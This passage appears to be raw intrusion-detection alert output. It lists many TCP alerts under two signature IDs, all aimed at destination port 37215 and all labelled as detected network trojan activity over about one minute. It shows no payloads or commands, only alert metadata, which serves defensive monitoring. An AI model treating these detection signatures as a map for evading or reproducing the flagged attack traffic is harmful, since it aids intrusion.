              Timestamp:06/13/24-21:32:30.079032
              SID:2829579
              Source Port:55528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309488
              SID:2829579
              Source Port:50598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614892
              SID:2835222
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697566
              SID:2829579
              Source Port:33962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039990
              SID:2829579
              Source Port:34778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871335
              SID:2829579
              Source Port:43946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929762
              SID:2829579
              Source Port:47652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124994
              SID:2835222
              Source Port:56388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751821
              SID:2835222
              Source Port:42042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406541
              SID:2829579
              Source Port:48714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045603
              SID:2829579
              Source Port:34146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355145
              SID:2829579
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823698
              SID:2829579
              Source Port:50018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149376
              SID:2829579
              Source Port:53780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506083
              SID:2835222
              Source Port:44164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307978
              SID:2835222
              Source Port:44792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317561
              SID:2835222
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305444
              SID:2829579
              Source Port:58726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707731
              SID:2829579
              Source Port:41318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993825
              SID:2829579
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097072
              SID:2829579
              Source Port:39420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725452
              SID:2829579
              Source Port:60616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212470
              SID:2835222
              Source Port:49272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242778
              SID:2835222
              Source Port:35818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217222
              SID:2829579
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028804
              SID:2829579
              Source Port:37440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248431
              SID:2835222
              Source Port:42756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870655
              SID:2835222
              Source Port:49552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128404
              SID:2829579
              Source Port:58004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253699
              SID:2835222
              Source Port:50150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458377
              SID:2829579
              Source Port:41898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568940
              SID:2835222
              Source Port:43560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568447
              SID:2829579
              Source Port:56666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264433
              SID:2829579
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867910
              SID:2829579
              Source Port:43066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993009
              SID:2835222
              Source Port:34906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544337
              SID:2829579
              Source Port:34834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155380
              SID:2829579
              Source Port:45854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728856
              SID:2829579
              Source Port:38938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042558
              SID:2835222
              Source Port:53850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266433
              SID:2835222
              Source Port:44060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543901
              SID:2835222
              Source Port:41298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158705
              SID:2829579
              Source Port:43988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629115
              SID:2835222
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544659
              SID:2835222
              Source Port:53546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041192
              SID:2829579
              Source Port:45836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129556
              SID:2829579
              Source Port:48554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278337
              SID:2829579
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528499
              SID:2835222
              Source Port:51130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216364
              SID:2835222
              Source Port:47076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136091
              SID:2829579
              Source Port:42576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971902
              SID:2835222
              Source Port:54428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038893
              SID:2829579
              Source Port:47086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274847
              SID:2829579
              Source Port:56784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451688
              SID:2829579
              Source Port:59648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551216
              SID:2829579
              Source Port:58888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631663
              SID:2829579
              Source Port:46848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297833
              SID:2835222
              Source Port:45108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728149
              SID:2829579
              Source Port:58242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245703
              SID:2829579
              Source Port:57952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154012
              SID:2829579
              Source Port:36928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219029
              SID:2835222
              Source Port:54058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090763
              SID:2835222
              Source Port:53520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043908
              SID:2835222
              Source Port:51922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553772
              SID:2829579
              Source Port:48260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093531
              SID:2835222
              Source Port:57160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914524
              SID:2835222
              Source Port:60228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376202
              SID:2829579
              Source Port:36892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276820
              SID:2835222
              Source Port:52000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885110
              SID:2835222
              Source Port:58538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611448
              SID:2835222
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090485
              SID:2835222
              Source Port:36828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785716
              SID:2829579
              Source Port:52610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197679
              SID:2835222
              Source Port:40710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297098
              SID:2829579
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278095
              SID:2835222
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353756
              SID:2835222
              Source Port:41552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306651
              SID:2835222
              Source Port:32994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322209
              SID:2835222
              Source Port:41344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791575
              SID:2829579
              Source Port:36240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752274
              SID:2829579
              Source Port:49044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156204
              SID:2829579
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345000
              SID:2829579
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247016
              SID:2835222
              Source Port:40050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402184
              SID:2829579
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754122
              SID:2829579
              Source Port:41470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322671
              SID:2835222
              Source Port:60272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214104
              SID:2835222
              Source Port:46858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502821
              SID:2829579
              Source Port:49898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174873
              SID:2835222
              Source Port:47024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100614
              SID:2829579
              Source Port:49132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376951
              SID:2829579
              Source Port:41482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655156
              SID:2835222
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136042
              SID:2829579
              Source Port:39370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100051
              SID:2829579
              Source Port:33656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421526
              SID:2829579
              Source Port:56398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093422
              SID:2829579
              Source Port:37588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976007
              SID:2835222
              Source Port:38718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781726
              SID:2835222
              Source Port:45786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726956
              SID:2829579
              Source Port:46920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524785
              SID:2835222
              Source Port:56756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659821
              SID:2829579
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303209
              SID:2835222
              Source Port:52166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166332
              SID:2835222
              Source Port:50486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510064
              SID:2835222
              Source Port:37220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193636
              SID:2829579
              Source Port:35988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402598
              SID:2835222
              Source Port:41904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785105
              SID:2835222
              Source Port:59256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633274
              SID:2829579
              Source Port:37996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048328
              SID:2835222
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571576
              SID:2829579
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059607
              SID:2835222
              Source Port:34866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.113706
              SID:2829579
              Source Port:59850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174493
              SID:2829579
              Source Port:51376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555104
              SID:2829579
              Source Port:39772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567421
              SID:2829579
              Source Port:60812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016138
              SID:2835222
              Source Port:41600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671354
              SID:2829579
              Source Port:50718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504132
              SID:2835222
              Source Port:41784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418492
              SID:2829579
              Source Port:43906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175867
              SID:2829579
              Source Port:42306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974175
              SID:2835222
              Source Port:41886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725972
              SID:2835222
              Source Port:57874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677272
              SID:2835222
              Source Port:53640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543758
              SID:2835222
              Source Port:33388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509312
              SID:2829579
              Source Port:40736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437830
              SID:2835222
              Source Port:43048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403278
              SID:2829579
              Source Port:59658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942517
              SID:2829579
              Source Port:38176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075321
              SID:2829579
              Source Port:57348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.305472
              SID:2835222
              Source Port:51200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359168
              SID:2829579
              Source Port:38630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200200
              SID:2829579
              Source Port:59522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109393
              SID:2835222
              Source Port:58420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371716
              SID:2835222
              Source Port:33084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992557
              SID:2835222
              Source Port:59540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357927
              SID:2829579
              Source Port:51632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213313
              SID:2835222
              Source Port:37310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783683
              SID:2829579
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193595
              SID:2829579
              Source Port:49436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039034
              SID:2835222
              Source Port:36112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194129
              SID:2829579
              Source Port:36298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040557
              SID:2829579
              Source Port:57712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675946
              SID:2829579
              Source Port:36182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157670
              SID:2835222
              Source Port:48696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787609
              SID:2829579
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174738
              SID:2829579
              Source Port:56180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654874
              SID:2829579
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477958
              SID:2829579
              Source Port:57206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153859
              SID:2835222
              Source Port:54878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242332
              SID:2829579
              Source Port:56122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821645
              SID:2835222
              Source Port:47006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758569
              SID:2829579
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477845
              SID:2829579
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130183
              SID:2829579
              Source Port:59866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027376
              SID:2829579
              Source Port:58532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633827
              SID:2835222
              Source Port:38344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823111
              SID:2835222
              Source Port:36874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555698
              SID:2829579
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192057
              SID:2835222
              Source Port:43920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730983
              SID:2835222
              Source Port:37298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309463
              SID:2835222
              Source Port:52732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012480
              SID:2835222
              Source Port:54852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175054
              SID:2835222
              Source Port:53312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833798
              SID:2835222
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476852
              SID:2829579
              Source Port:43908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274810
              SID:2829579
              Source Port:34334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340972
              SID:2835222
              Source Port:47644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041800
              SID:2829579
              Source Port:34136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177091
              SID:2829579
              Source Port:50712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978030
              SID:2829579
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475748
              SID:2835222
              Source Port:35176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729446
              SID:2829579
              Source Port:50074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096856
              SID:2835222
              Source Port:60896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610106
              SID:2835222
              Source Port:39414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128917
              SID:2835222
              Source Port:53268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374726
              SID:2835222
              Source Port:38890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802577
              SID:2829579
              Source Port:44580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125554
              SID:2835222
              Source Port:42210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423499
              SID:2835222
              Source Port:60554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151809
              SID:2829579
              Source Port:36114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093920
              SID:2829579
              Source Port:58340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194620
              SID:2835222
              Source Port:52804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133569
              SID:2835222
              Source Port:52674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457019
              SID:2835222
              Source Port:44676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404145
              SID:2829579
              Source Port:42600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193266
              SID:2829579
              Source Port:59838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833008
              SID:2829579
              Source Port:35758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450997
              SID:2835222
              Source Port:44516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569503
              SID:2829579
              Source Port:47588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457389
              SID:2835222
              Source Port:34480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868686
              SID:2835222
              Source Port:48894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307125
              SID:2835222
              Source Port:38394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439973
              SID:2829579
              Source Port:55480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527715
              SID:2829579
              Source Port:54800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696691
              SID:2829579
              Source Port:52950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527865
              SID:2835222
              Source Port:44448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710796
